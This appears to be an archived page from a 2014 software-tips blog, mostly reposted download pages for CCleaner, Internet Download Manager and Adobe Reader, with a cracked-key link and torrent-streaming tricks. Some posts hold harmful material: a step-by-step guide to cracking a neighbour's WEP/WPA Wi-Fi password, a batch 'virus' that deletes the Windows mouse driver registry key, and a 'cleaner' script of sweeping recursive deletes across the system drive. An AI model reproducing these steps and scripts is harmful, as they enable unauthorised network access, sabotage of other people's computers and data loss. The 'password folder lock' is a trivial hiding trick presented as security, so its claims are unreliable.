Showing posts with label PROGRAM TIPS. Show all posts
Showing posts with label PROGRAM TIPS. Show all posts

Sunday, March 29, 2015

CCleaner 5.04.5151

CCleaner 5.04.5151


Probably the most popular freeware cleaner globally with over 1 billion downloads since its launch in 2003. Piriform’s CCleaner is a quick and easy to use program which makes your computer faster, more secure and more reliable. CCleaner removes cookies, temporary files and various other unused data that clogs up your operating system. This frees up valuable hard disk space allowing your system to run faster. Removing this data also protects your anonymity meaning you can browse online more securely. The built in Registry Cleaner fixes errors and broken settings to make your computer more stable. The simple, intuitive UI and rapid but powerful cleaning make CCleaner a favourite among novices and techies alike. Professional, Network, Business and Technician Editions of CCleaner are also available for serious users.

ccleaner 5.0.4.5151

A Faster Computer
Browsing the internet your computer picks up a whole host of unnecessary files, cookies and history. The same thing happens when you run most programs on your computer – lots of temporary files and settings are saved. CCleaner removes these unused files and settings to free up valuable hard drive space, enabling your system to run faster. The default settings only focus on typical junk files and locations so you’re unlikely to lose important information unless you alter these. A Startup Cleaner also helps you to identify and remove unused programs running in the background when you start your computer. This makes the startup time shorter and puts less strain on your hard drive throughout use. You can read more about startup support here.

Less Crashes & System Errors
If you notice lots of system freezes, error messages and often experience crashes, the chances are your registry become cluttered with unused files and broken settings. CCleaner’s fully featured Registry Cleaner identifies these issues and fixes them. The registry analysis takes seconds and cleaning just a little bit longer. Prompts advise you when to save backups to avoid losing important data.

More Secure Browsing
Advertisers and websites track your behaviour online with cookies. Saved passwords, cached data and internet histories make your identity less secure. CCleaner removes these files to make your browsing experience confidential, meaning you are less likely to suffer from identity theft and/or online fraud. The military grade Drive Wiper ensures any data you want to be permanently deleted, stays deleted.

Customisable Cleaning
CCleaner Tools and Options tabs allow you to customise cleaning options to fit your needs. If you are not a savvy user, you might want to stick with the safe default settings. Advanced users can uninstall unwanted programs, select which cookies to save, customise cleaning settings and setup system monitoring.

Summary
CCleaner has earned its position at the top of the freeware cleaners offering the sort of features premium programs struggle to compete with. The clean, intuitive UI makes it one of the easiest programs to use, but don’t let its size and simplicity fool you. This is a powerful utility for improving your computers performance. Piriform’s regular update process means CCleaner is constantly improving and its popularity will continue to grow...

DOWNOLOAD : CLICK HERE

Thursday, November 27, 2014

CCleaner v5.00.5050 + All Editions





       

Description:



CCleaner is the number-one tool for cleaning your Windows PC. It protects your privacy online and makes your computer faster and more secure. .CCleaner is our system optimization, privacy and cleaning tool. It removes unused files from your system - allowing Windows to run faster and freeing up valuable hard disk space. It also cleans traces of your online activities such as your Internet history. Additionally it contains a fully featured registry cleaner. But the best part is that it's fast (normally taking less than a second to run) 

It can clean:



Internet Explorer:
Temporary files, history, cookies, super cookies, Autocomplete form history, index.dat files.

Firefox:
Temporary files, history, cookies, super cookies, download history, form history.

Google Chrome:
Temporary files, history, cookies, super cookies, download history, form history.

Opera:
Temporary files, history, cookies, super cookies, download history.

Apple Safari:
Temporary files, history, cookies, super cookies, form history.

Other Supported Browsers:
K-Meleon, Rockmelt, Flock, Google Chrome Canary, Chromium, SeaMonkey, Chrome Plus, SRWare Iron, Pale Moon, Phoenix, Netscape Navigator, Avant and Maxthon.

Windows:
Recycle Bin, Recent Documents, Temporary files, Log files, Clipboard, DNS Cache, Error Reporting, Memory Dumps, Jump Lists.

Registry Cleaner:
Advanced features to remove unused and old entries, including File Extensions, ActiveX Controls, ClassIDs, ProgIDs, Uninstallers, Shared DLLs, Fonts, Help Files, Application Paths, Icons, Invalid Shortcuts and more...

Third-party applications:
Removes temp files and recent file lists (MRUs) from many apps including Windows Media Player, eMule, Google Toolbar, Microsoft Office, Nero, Adobe Acrobat, WinRAR, WinAce, WinZip and many more...


What's New in version 5.00.5050: 



v5.00.5050 (25 Nov 2014)
- New improved GUI.
- Improved internal architecture for better performance.
- Added Google Chrome plugin management.
- Improved Google Chrome Startup item detection.
- Optimized automatic updates for Pro version.
- Improved system restore detection routine. 
- Updated exception handling and reporting architecture.
- Optimized 64-bit builds on Windows 8, 8.1 and 10.
- Updated various translations. 
- Many performance improvements and bug fixes.



DOWNLOAD : CLICK HERE

Saturday, November 22, 2014

How To Hack Wifi Password

How To Hack Wifi Password


If you are living nearby someones WiFi hotspot and every time your laptop search for connection its showing up but you don't have passwords. Or you just want to steal someones WPA/WPA2 Wi-Fi hotspots key or passwords. Don't worry...


 I’ll show How to hack a WPA/WPA2 Wi-Fi connection through a bootable USB.

THINGS YOU WILL NEED -

1.A USB pen drive
2.beini.iso file. Download beini.iso  OR Click here 
3.UNetbootin software to make your USB drive bootable. Download UnetBootin for Windows, Mac or Linux

Some few steps you would have to do (WEP)

1. Write beini.iso on your USB by UNetbootin. Set everything according to this image below.


a
2. After finishing restart your PC and boot it from your USB.
3. If you were successful to boot up then you should see something like this. Click Minidwep-gtk.

a



4. Click OK.

a

5. Now Minipwep-gtk program will open. Click Scan.

a

6. Select a wireless network(should have Client) from the list. And click Launch to start cracking process.

a







7. Sometimes it take a while according to your victim connections, IVS value and password strength. So keep patience.






a






8. If it finds a password, it should appear like this.

a

To crack WPA/WPA2 follow this image instruction.

RESTART YOUR PC AND BOOT FROM YOUR OS THEN ENTER THE FOUND PASSWORD.


THANK YOU 





Tuesday, November 18, 2014

How To Lock Any Folder With Password Without Software

Hai Guys Today i will show you how to lock any Folder with Password without Using Any Software To Secure your files

HOW TO LOCK FOLDER ?


1. Open Notepad And Copy The Below Code into it :

cls
@ECHO OFF
title http://www.downloadsadda.com/
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== 
downloadsadda.com goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End 


2. Now Change "downloadsadda.com" with Your Desired Password

3. Save The File As Password.bat

4. Now Double Click on Password.bat and a new folder will be created

5. Now Copy All YOur Important Data in That Folder

6. Now Double Click On Password.bat and press Type Y when cmd appears

7. Now That Folder is Hidden from your view double click on Password.bat and enter your password

Thats it now you can secure your data Without any expensive Software .

Saturday, November 8, 2014

Internet Download Manager v6.21

Internet Download Manager v6.21 build 15




DOWNLOAD : CLICK HERE

Internet Download Manager v6.21. Added Windows 8.1 compatibility. Fixed compatibility problems with different browsers including Internet Explorer 11, all Mozilla Firefox versions up to Mozilla Firefox Aurora, Google Chrome. Improved FLV grabber to save videos from web players on web pages, Google Video, MySpace TV, and other popular sites.

Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, resume and schedule downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download managers and accelerators Internet Download Manager segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance.
Internet Download Manager supports proxy servers, ftp and http protocols, firewalls, redirects, cookies, authorization, MP3 audio and MPEG video content processing. IDM integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla, Mozilla Firefox, Mozilla Firebird, Avant Browser, MyIE2, and all other popular browsers to automatically handle your downloads. You can also drag and drop files, or use Internet Download Manager from command line. Internet Download Manager can dial your modem at the set time, download the files you want, then hang up or even shut down your computer when it's done. 


Features:

• Internet Download Manager supports all popular browsers including Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla Firefox, Avant Browser, and it can be integrated into any Internet application to take over downloads using unique “Advanced Browser Integration” feature.
• Dynamic Segmentation and Performance.
• Easy downloading with one click. When you click on a download link in a browser, IDM will take over the download and accelerate it. IDM supports HTTP, FTP, HTTPS and MMS protocols.
• Download Speed Acceleration. IDM can accelerate downloads by up to 5 times due to its intelligent dynamic file segmentation technology.
• Download Resume. Internet Download Manager will resume unfinished download from the place where they left off.
• YouTube grabber. IDM can grab FLV videos from popular sites like YouTube, MySpaceTV, and Google Video.
• Drag and Drop. You may simply drag and drop links to IDM, and drag and drop downloaded files out of Internet Download Manager.
• Automatic Antivirus checking. Antivirus checking makes your downloads free from viruses and trojans.
• Advanced Browser Integration. When enabled, the feature can be used to catch any download from any application.
• Built-in Scheduler. IDM can connect to the Internet at a set time, download the files you want, disconnect, or shut down your computer when it’s done.
• IDM includes web site spider and grabber. IDM downloads all required files that are specified with filters from web sites, for example all pictures from a web site, or subsets of web sites, or complete web sites for offline browsing. It’s possible to schedule multiple grabber projects to run them once at a specified time, stop them at a specified time, or run periodically to synchronize changes.
• IDM supports many types of proxy servers. For example, IDM works with Microsoft ISA, and FTP proxy servers.
• IDM supports main authentication protocols: Basic, Negotiate, NTLM, and Keberos. Thus IDM can access many Internet and proxy servers using login name and password.
• Download All feature. IDM can add all downloads linked to the current page. It’s easy to download multiple files with this feature.
• Download Categories. IDM can be used to organize downloads automatically using defined download categories.
• Download limits. Progressive downloading with quotas feature. The feature is useful for connections that use some kind of fair access policy (or FAP) like Direcway, Direct PC, Hughes, etc.
• Internet Download Manager is multilingual.

What's new in version 6.21 Build 15

(Released: Nov 07, 2014)
Added the recognition of new types of videos
Fixed bugs


DOWNLOAD : CLICK HERE



Thursday, November 6, 2014

Adobe Reader 11.0.09




DOWNLOAD :CLICK HERE

Adobe Reader is the most popular program in the world for viewing, creating, managing and manipulating PDF (Portable Document Format) files. It is the standard that all other PDF readers are judged against. Publically released in 1993, Adobe Reader was originally priced at $50 per user before Adobe separated its product range to offer Adobe Reader freeware and their professional Adobe Acrobat versions. PDF became the file format of choice for businesses thanks to its cross platform flexibility and security capabilities.

Simple UI

Adobe Reader’s UI is simple and intuitive. Classic tools (text selection, zoom, snapshots, find, etc.) can be accessed from the top navigation menu and buttons. The latest version also includes advanced Tools (create, export, send and store options), Sign and Comment features. You can share iterations, comments and signatures by email or using the Adobe SendNow service.

Security

Adobe Reader XI is the safest version Adobe have released. This is mainly due the new Protected Mode which loads potentially hazardous items and code in a sandboxed area, isolated from the rest of your system.

Speed

There have been some criticisms over Adobe Reader’s speed compared to other lightweight PDF readers. It’s true; Adobe Reader does have more plugins and extensions than most PDF readers which can slow operation. That being said the difference for the average user is negligible and those add-ons can be disabled if they are not required. In terms of general operation, Adobe Reader renders documents with high detail and true colour reproduction quickly. Later editions have also had work done to improve Adobe Reader’s impact on memory usage so you should find multitasking takes less strain on your system.



DOWNLOAD :CLICK HERE

CCleaner 4.19.4867

CCleaner 4.19.4867



DOWNLOAD : CLICK HERE

Probably the most popular freeware cleaner globally with over 1 billion downloads since its launch in 2003. Piriform’s CCleaner is a quick and easy to use program which makes your computer faster, more secure and more reliable. CCleaner removes cookies, temporary files and various other unused data that clogs up your operating system. This frees up valuable hard disk space allowing your system to run faster. Removing this data also protects your anonymity meaning you can browse online more securely. The built in Registry Cleaner fixes errors and broken settings to make your computer more stable. The simple, intuitive UI and rapid but powerful cleaning make CCleaner a favourite among novices and techies alike. Professional, Network, Business and Technician Editions of CCleaner are also available for serious users.


A Faster Computer

Browsing the internet your computer picks up a whole host of unnecessary files, cookies and history. The same thing happens when you run most programs on your computer – lots of temporary files and settings are saved. CCleaner removes these unused files and settings to free up valuable hard drive space, enabling your system to run faster. The default settings only focus on typical junk files and locations so you’re unlikely to lose important information unless you alter these. A Startup Cleaner also helps you to identify and remove unused programs running in the background when you start your computer. This makes the startup time shorter and puts less strain on your hard drive throughout use. 

Less Crashes & System Errors

If you notice lots of system freezes, error messages and often experience crashes, the chances are your registry become cluttered with unused files and broken settings. CCleaner’s fully featured Registry Cleaner identifies these issues and fixes them. The registry analysis takes seconds and cleaning just a little bit longer. Prompts advise you when to save backups to avoid losing important data.

More Secure Browsing

Advertisers and websites track your behaviour online with cookies. Saved passwords, cached data and internet histories make your identity less secure. CCleaner removes these files to make your browsing experience confidential, meaning you are less likely to suffer from identity theft and/or online fraud. The military grade Drive Wiper ensures any data you want to be permanently deleted, stays deleted.

Customisable Cleaning

CCleaner Tools and Options tabs allow you to customise cleaning options to fit your needs. If you are not a savvy user, you might want to stick with the safe default settings. Advanced users can uninstall unwanted programs, select which cookies to save, customise cleaning settings and setup system monitoring.

DOWNLOAD : CLICK HERE

Thursday, October 9, 2014

Rocket Boy Widget

 Back to Top Scrolling Rocket Boy Widget


Well you already knew about the scrolling widget people add onto their blog in order to allow any visitor to scroll to the top of the page by just clicking that button, well but now for this occasion we have a nice animated rocket widget that looks really good. So I do not have any demo link available but its easy to implement so have a look.


  1. Open Blogger>Template>Edit HTML
  2. Press CTRL + F  and search for </body> tag and paste the following code below it.
<style>#backtotop{background:url(http://i.imgur.com/m4Z2HpS.png) 0 0 no-repeat;bottom:5px;cursor:pointer;height:130px;padding:5px;position:fixed;right:5px;width:72px;z-indez:1}#backtotop:hover{background:url(http://i.imgur.com/m4Z2HpS.png)no-repeat;background-position:0 -142px}</style><script src='http://ajax.googleapis.com/ajax/libs/jquery/1.10.0/jquery.min.js'/><script type='text/javascript'>//<![CDATA[
$(window).scroll(function(){if($(this).scrollTop()>100){$("#backtotop").removeAttr("href");$("#backtotop").stop().animate({bottom:"0"},{duration:100,queue:false})}else{$("#backtotop").stop().animate({bottom:"30000"},{duration:8e3,queue:false})}});$(function(){$("#backtotop").click(function(){$("html, body").animate({scrollTop:0},"slow");return false})})//]]></script><a href='#' id='backtotop'/>

3.  Now hit Save Template & refresh your blog to see this cool rocket boy in full action, so as you scroll down and click this blog he will take you up & launch away.

 

Torrent Movies without Downloading

How to Watch Torrent Movies without Downloading

Need to know "How to Watch Torrent Videos without Downloading" then Roxplayer is the response. Roxplayer is the current media player showed up, with extremely imaginative and intriguing principle of streaming torrent files. The player enables users to enjoy video files from torrent without in fact downloading them on their system. The streaming works for both audio and video files. Another use that I discovered of Roxplayer is to check the quality of the torrent file prior to downloading. The majority of the torrent submits does not featured sample and after downloading we discovered that either audio is not sync or video is not view-able. To avoid yourself from such troubles simply copy the torrent magnet Uri in the Roxplayer and view the quality and choose later on whether to download total file or not.

Best Way to view Torrent Videos without Downloading

Utilizing Roxplayer is really easy, very first you have to download the software application. Install it on your system and open the player for the very first time. You will certainly see a spick-and-span user interface just like VLC Media player.
  1. Browse to the File Menu and Click on Open torrent which will certainly additionally reveal 3 various choices to choose the torrent source. In the screenshot below you can see I have actually picked torrent magnet link.rox player opening menu
  2. Now after clicking the .torrent Magnet Link you will see a dialog where it asks you to paste the link to the Magnet URL.
  3. You can get that Magnet URL from maximum torrent sites, I am using kickass.to so you visit any movie or video torrent and then right click on the link like below.torrent magnet link
  4. Now just paste the copied URL in the Roxplayer field and boom it will start to get your torrent file.
  5. Now after few seconds you will see the files in the torrent, just choose the main movie file and double click on it.
Roxplayer took around 3-4 minutes to buffer the video prior to beginning playing media file without really downloading the file on my system. Well I found this the most amazing tool to stream torrent movies and videos prior to downloading them and wasting all the useful bandwidth.

 Conclusion

Extremely good and effective media player to have in your system. Not just this assists you view torrent videos without downloading however you can likewise attempt the torrent file prior to downloading. Another food I such as about the Roxplayer device is the choice to include YIFY films plugin that enables you to Browse and view all YIFY rip motion pictures in outstanding DVD, 720p, 1080p. I Hope you like the post How to see Torrent Videos without Downloading. If you think any other player has the same capability the do comment below I am waiting.

Tuesday, October 7, 2014

CCleaner 4.18.4844

CCleaner 4.18.4844



Probably the most popular freeware cleaner globally with over 1 billion downloads since its launch in 2003. Piriform’s CCleaner is a quick and easy to use program which makes your computer faster, more secure and more reliable. CCleaner removes cookies, temporary files and various other unused data that clogs up your operating system. This frees up valuable hard disk space allowing your system to run faster. Removing this data also protects your anonymity meaning you can browse online more securely. The built in Registry Cleaner fixes errors and broken settings to make your computer more stable. The simple, intuitive UI and rapid but powerful cleaning make CCleaner a favourite among novices and techies alike. Professional, Network, Business and Technician Editions of CCleaner are also available for serious users.

 

A Faster Computer

Browsing the internet your computer picks up a whole host of unnecessary files, cookies and history. The same thing happens when you run most programs on your computer – lots of temporary files and settings are saved. CCleaner removes these unused files and settings to free up valuable hard drive space, enabling your system to run faster. The default settings only focus on typical junk files and locations so you’re unlikely to lose important information unless you alter these. A Startup Cleaner also helps you to identify and remove unused programs running in the background when you start your computer. This makes the startup time shorter and puts less strain on your hard drive throughout use. 


Less Crashes & System Errors

If you notice lots of system freezes, error messages and often experience crashes, the chances are your registry become cluttered with unused files and broken settings. CCleaner’s fully featured Registry Cleaner identifies these issues and fixes them. The registry analysis takes seconds and cleaning just a little bit longer. Prompts advise you when to save backups to avoid losing important data.



More Secure Browsing

Advertisers and websites track your behaviour online with cookies. Saved passwords, cached data and internet histories make your identity less secure. CCleaner removes these files to make your browsing experience confidential, meaning you are less likely to suffer from identity theft and/or online fraud. The military grade Drive Wiper ensures any data you want to be permanently deleted, stays deleted.

Customisable Cleaning

CCleaner Tools and Options tabs allow you to customise cleaning options to fit your needs. If you are not a savvy user, you might want to stick with the safe default settings. Advanced users can uninstall unwanted programs, select which cookies to save, customise cleaning settings and setup system monitoring.


Summary

CCleaner has earned its position at the top of the freeware cleaners offering the sort of features premium programs struggle to compete with. The clean, intuitive UI makes it one of the easiest programs to use, but don’t let its size and simplicity fool you. This is a powerful utility for improving your computers performance. Piriform’s regular update process means CCleaner is constantly improving and its popularity will continue to grow.

DOWNLOAD :CLICK HERE

Wednesday, October 1, 2014

Recover Photos, files and data from your memory card


Recover Photos, files and data from your memory card

Card Recovery Pro 2.5.5




Download : HERE
Key : HERE

Card Recovery Pro is an easy-to-use card recovery software that can effectively recover deleted or lost photos, music, video, and multimedia files from almost all digital cards after instances like deletion, corruption and formatting, etc. Using CardRecoveryPro is safe and risk-free. The software performs read-only operations on your memory card. It doesn't move, delete, or modify the data on the card to avoid causing further damage or overwriting. It recovers the photos, music, video, and multimedia files from the source memory card and saves them to the destination location you specify in just a few steps. Simple procedure! Amazing effect!

It can help you to get your songs, karaoke, music compositions or any other lost audio file back.

Recover Photos from Formatted Card or Hard drive;

Recover your images even after you have lost them due to memory card deletion, formatting and corruption, hard drive memory or card without taking backup or creating an image of the drive.

Digital Camera Photo Recovery: Help you to recover all your lost pictures from any model of Digital Camera. And the software also supports RAW recovery of pictures from all major digital camera brands. Memory Card Recovery: Help you get your lost photos and other multimedia files back from any formatted /corrupted / damaged Internal or External storage media. Digital Photo Recovery: Recover photos/pictures from formatted or corrupted storage media as well as Video File Recovery.

If your SD card or memory card is formatted or corrupted, your important files, data or photos are lost, deleted or missing, you can just download and install Card recovery pro.


Thursday, May 22, 2014

Use Pendrive as RAM

Use Pendrive as RAM

In Windows you can use your pen drive as a RAM

1) Connect your pen drive to your PC [pen drive should be at least 1 GB or if you having 4 GB then its better]

2) Allow PC what he is supposed to do,let system to detect pen drive.

3) After your PC finished with its detection work,you have to do some little

4) Right click on the My Computer and select the properties

5) Goto advanced and then performance setting then advanced then

6) Select pen drive and click on custom size " Check the value of space available "

7) Enter the same in the Initial and the Max columns

" You just used the memory of the PenDrive as a Virtual Memory "

8) Now restart your pc and enjoy your fast and super system

Downloading Torrent Using Internet Download Manager


Hello friends, today i will show you the way to download torrents with Internet Download Manager. Torrent is tiny file with .torrent extension which allows you to download huge amount of data. We use torrents to download various stuffs like movies, games, software package and plenty of different things. you'll transfer torrents from several website.  The transfer speed for torrents depends on seeds it has. It will make difficult for you to download files with very low or no seed counts. However with the assistance of this trick you'll be able to download torrent file with IDM. This tool can be really helpfull when you want to download file that has
 very low seeds. IDM is the quickest file transfer manager on the internet market. So lets begin!


How To Transfer Torrent With IDM



1. First download the torrent file with .torrent extension which you wish to download from the internet directly without any torrent client like utorrent.
Downloading Torrent Using Internet Download Manager 

2. Now open zbigz.com and you will land on its homepage.

3. Then Click on upload Torrent and browse your torrent to transfer and click on Go.

4. Then it will ask you for Free or Premium service, choose Free to proceed further.

5. It will take some time to cache your file. Once the caching is done, click on transfer button to download your file as shown below.
Downloading Torrent Using Internet Download Manager 

6. You should have internet download manager installed on your computer so that download start inside IDM. If you don't have 
IDM don't worry it will download directly.

Monday, May 19, 2014

TALKING TOM 2 FOR PC RAGHAV

1.Open the Downloaded file.


 2.Click on Allow Button.As shown in picture.


 3.Now speak in your mic Tom cat is Listening you.
                                                                           


4.When you click on one of the Buttons Tom will do some action according to Button which you selected.



5. After doing actions Tom cat will speak in his own Voice. 

Note: If you have any problem in this file then close and reopen the file.If still there is same problem then reopen the file 2-3 times.

That's all you have to do to get Talking Tom cat 2 for PC.

DOWNLOAD HERE :CLICK HERE


Wednesday, May 14, 2014

HOW TO UNINSTALL ANY SOFTWARE BY RIGHT CLICK

Friends, if you are fond of new softwares and try new & new software daily on your pc. Then i think one and only thing you hate is that you have to go to control panel to uninstall the softwares. So my this trick will help you to overcome from this problem. I will tell you how to uninstall any program by right click. Here are some steps, just follow them -
STEP 1.
First of all download & Install this software on your pc.
DOWNLOAD HERE :CLICK HERE

STEP 2.
Now Right click on any program which you want to uninstall.

STEP 3.
After doing step 2, you’ll see below type of screen, now just click on STANDARD UNINSTALL option.
That’s it, you have done



HOW TO SET PASSWORD ON ANY APPLICATION IN PC


Hello friends, today I am going to tell you a trick to make your pc softwares password protected. It means whenever anyone open any software in your pc then he/she will be asked for a password if the user don’t know the password then he can not use the software. If you are interested to protect your pc softwares with password then just follow below steps


STEP 1:
First of all download a software named Password Door to your pc [Download: 594.85 KB]
DOWNLOAD HERE :CLICK HERE

STEP 2:
Now install it to your pc, while installing , it will ask you to enter a password which will be used to open the password protected softwares.

STEP 3:
Now open Password Door with the help of password which you have entered while installing
Now Click on protect a program.

STEP 4:
Now You’ll see a list of all program on which you can set password.

Select the app from the list and make it password protect.

Now whenever you or any other user open password protected app, app will ask for the password. if you know the password on then you can access the application.

You can remove password from apps anytime.

NOTE: If you are thinking, your little bro or sis uninstall Password Door to access the application, then they can’t do it, because this program will ask for the same password to uninstall it from pc

Sunday, May 4, 2014


Tricks To Clean All Temporary Files,Cookies,Temporary Internet Files

Just use notepad....
Step 1:
Start with making a new txt file.
Step 2:
Paste this code in the txt file:
Code: Select all
@echo off
echo Webhog Cleaner
echo waiting
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q ?%userprofile%\Local Settings\Temporary Internet Files\*.*?
del /f /s /q ?%userprofile%\Local Settings\Temp\*.*?
del /f /s /q ?%userprofile%\recent\*.*?
echo complete!
echo. & pause
Step 3:
Now save the file as "Cleaner.bat"
After saving this file, Just open it and see for your self.
THIS WILL MAKE YOUR COMPUTER FASTER ...

How to make a virus that disable mouse...


this is only for educational purpose and think before trying..:-


Steps:
1.open notepad
2.copy the codes given below
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
3.save this file as virus.bat
4.done

Downloads adda.com Downloadsadda © 2014. All Rights Reserved | Powered by-Blogger